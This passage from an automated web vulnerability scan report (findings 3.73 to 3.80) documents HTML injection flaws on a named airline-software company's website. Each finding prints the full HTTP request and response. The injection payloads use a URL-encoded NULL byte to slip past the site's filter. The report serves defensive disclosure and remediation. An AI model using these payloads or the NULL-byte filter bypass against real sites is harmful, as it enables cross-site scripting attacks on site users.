Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:49:15 GMT
Pragma: no-cache
Content-Length: 6768
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_sales/?%0076d86"><a>d13558ba028=1">
...[SNIP]...

3.73. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d46ba"><a>f8bc401d242 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d46ba"><a>f8bc401d242 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services?%00d46ba"><a>f8bc401d242=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:15:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:15:38 GMT; path=/
Set-Cookie: exp_last_activity=1286378138; expires=Thu, 06-Oct-2011 10:15:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:15:59 GMT
Pragma: no-cache
Content-Length: 6746
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_support_and_services?%00d46ba"><a>f8bc401d242=1">
...[SNIP]...

3.74. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0059a0b<a>b4a625dc95a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59a0b<a>b4a625dc95a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services?%0059a0b<a>b4a625dc95a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:18:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:18:33 GMT; path=/
Set-Cookie: exp_last_activity=1286378312; expires=Thu, 06-Oct-2011 10:18:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:18:54 GMT
Pragma: no-cache
Content-Length: 6742
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>b4a625dc95a=1">product support and services?%0059a0b<a>b4a625dc95a=1</a>
...[SNIP]...

3.75. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c2a4b<a>8c093d8e894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2a4b<a>8c093d8e894 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services/?%00c2a4b<a>8c093d8e894=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:00:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 10:00:24 GMT; path=/
Set-Cookie: exp_last_activity=1286377224; expires=Thu, 06-Oct-2011 10:00:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:00:44 GMT
Pragma: no-cache
Content-Length: 6806
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>8c093d8e894=1">?%00c2a4b<a>8c093d8e894=1</a>
...[SNIP]...

3.76. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0072aaa"><a>a86720643c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72aaa"><a>a86720643c4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services/?%0072aaa"><a>a86720643c4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:57:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 09:57:20 GMT; path=/
Set-Cookie: exp_last_activity=1286377040; expires=Thu, 06-Oct-2011 09:57:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:57:35 GMT
Pragma: no-cache
Content-Length: 6810
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_support_and_services/?%0072aaa"><a>a86720643c4=1">
...[SNIP]...

3.77. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f3b04<a>52fec2027bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3b04<a>52fec2027bf in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation?%00f3b04<a>52fec2027bf=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321510; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:22:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321510; expires=Thu, 06-Oct-2011 10:22:11 GMT; path=/
Set-Cookie: exp_last_activity=1286378530; expires=Thu, 06-Oct-2011 10:22:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:22:24 GMT
Pragma: no-cache
Content-Length: 6801
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>52fec2027bf=1">sabre holdings corporation?%00f3b04<a>52fec2027bf=1</a>
...[SNIP]...

3.78. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009e7cd"><a>c340023f0cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e7cd"><a>c340023f0cc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation?%009e7cd"><a>c340023f0cc=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321510; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:18:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321510; expires=Thu, 06-Oct-2011 10:18:26 GMT; path=/
Set-Cookie: exp_last_activity=1286378306; expires=Thu, 06-Oct-2011 10:18:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:18:47 GMT
Pragma: no-cache
Content-Length: 6805
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/sabre_holdings_corporation?%009e7cd"><a>c340023f0cc=1">
...[SNIP]...

3.79. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001509d"><a>ced17157749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1509d"><a>ced17157749 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation/?%001509d"><a>ced17157749=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321465; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321465; expires=Thu, 06-Oct-2011 09:57:06 GMT; path=/
Set-Cookie: exp_last_activity=1286377026; expires=Thu, 06-Oct-2011 09:57:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A4%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:57:26 GMT
Pragma: no-cache
Content-Length: 6867
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/sabre_holdings_corporation/?%001509d"><a>ced17157749=1">
...[SNIP]...

3.80. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %006b56e<a>b10196b1995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b56e<a>b10196b1995 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation/?%006b56e<a>b10196b1995=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321465; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:00:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321465; expires=Thu, 06-Oct-2011 10:00:36 GMT; path=/
Set-Cookie: exp_last_activity=1286377236; expires=Thu, 06-Oct-2011 10:00:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A4%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3B%7D; path=/
